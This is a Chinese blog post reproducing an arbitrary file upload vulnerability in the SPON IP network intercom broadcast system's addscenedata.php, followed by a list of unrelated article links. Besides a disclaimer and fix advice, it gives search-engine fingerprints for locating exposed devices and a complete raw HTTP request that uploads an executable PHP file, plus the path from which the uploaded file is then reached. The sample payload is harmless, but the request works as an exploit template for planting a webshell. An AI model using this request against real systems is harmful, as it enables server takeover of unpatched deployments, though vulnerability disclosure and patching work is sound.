当前位置: 首页 > news >正文

【漏洞复现】世邦通信 SPON IP网络对讲广播系统 addscenedata.php 任意文件上传漏洞

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

        世邦通信 SPON IP网络对讲广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

        世邦通信 SPON IP网络对讲广播系统 addscenedata.php 存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。

网络空间测绘

Fofa

icon_hash="-1830859634"

Quake

favicon: "e854b2eaa9e4685a95d8052d5e3165bc"

image.png

漏洞复现

POST /php/addscenedata.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 279
Content-Type: multipart/form-data; boundary=b0b0dcc3da2dd47434dfbafd7be4c6d5965a5bf03b1e9affc7e72eea848b
Accept-Encoding: gzip, deflate, br
Connection: close--b0b0dcc3da2dd47434dfbafd7be4c6d5965a5bf03b1e9affc7e72eea848b
Content-Disposition: form-data; name="upload"; filename="test.php"
Content-Type: application/octet-stream<?php echo md5(1);unlink(__FILE__);?>
--b0b0dcc3da2dd47434dfbafd7be4c6d5965a5bf03b1e9affc7e72eea848b--

image.png
访问路径:http://127.0.0.1/images/scene/test.php
image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级产品到最新版本

相关文章:

  • Linux 查看 CPU核数 及 内存
  • Goroutine和协程的区别
  • SpringCloud微服务框架的原理及应用详解(一)
  • 常见的宽基指数基金
  • PHP混淆加密以及常用的一些加密工具
  • 内核学习——1、list_head
  • 深度解析响应式异步编程模型
  • 巧用newSingleThreadExecutor让异步任务顺序跑
  • 构建一个强大的小型虚拟负载
  • 记录SpringBoot启动报错解决
  • Spring IoC【控制反转】DI【依赖注入】
  • 爬虫逆向实战(41)-某花顺登陆(Cookie、MD5、SHA256)
  • 关于scrapy模块中间件的简单理解
  • 案例分享:高科技企业产品管理部门设置和产品经理岗位设置
  • MySQL 面试突击指南:核心知识点解析1
  • 78. Subsets
  • Apache Spark Streaming 使用实例
  • CSS3 变换
  • Effective Java 笔记(一)
  • Javascript编码规范
  • NLPIR语义挖掘平台推动行业大数据应用服务
  • Protobuf3语言指南
  • PV统计优化设计
  • Vue 2.3、2.4 知识点小结
  • 从PHP迁移至Golang - 基础篇
  • 第十八天-企业应用架构模式-基本模式
  • 浅谈web中前端模板引擎的使用
  • 区块链共识机制优缺点对比都是什么
  • 设计模式(12)迭代器模式(讲解+应用)
  • 责任链模式的两种实现
  • 【云吞铺子】性能抖动剖析(二)
  • 阿里云服务器如何修改远程端口?
  • #Linux(make工具和makefile文件以及makefile语法)
  • (~_~)
  • (9)目标检测_SSD的原理
  • (C#)获取字符编码的类
  • (二)Kafka离线安装 - Zookeeper下载及安装
  • (翻译)Quartz官方教程——第一课:Quartz入门
  • (附表设计)不是我吹!超级全面的权限系统设计方案面世了
  • (免费领源码)python#django#mysql公交线路查询系统85021- 计算机毕业设计项目选题推荐
  • (排序详解之 堆排序)
  • (七)Activiti-modeler中文支持
  • (十)c52学习之旅-定时器实验
  • (顺序)容器的好伴侣 --- 容器适配器
  • (一)面试需要掌握的技巧
  • (原创)攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS)
  • (原創) 如何刪除Windows Live Writer留在本機的文章? (Web) (Windows Live Writer)
  • .bat文件调用java类的main方法
  • .gitignore文件---让git自动忽略指定文件
  • .NET CF命令行调试器MDbg入门(一)
  • .NET Core 控制台程序读 appsettings.json 、注依赖、配日志、设 IOptions
  • .Net Web窗口页属性
  • .NET简谈设计模式之(单件模式)
  • .NET企业级应用架构设计系列之应用服务器
  • [AIGC] Java 和 Kotlin 的区别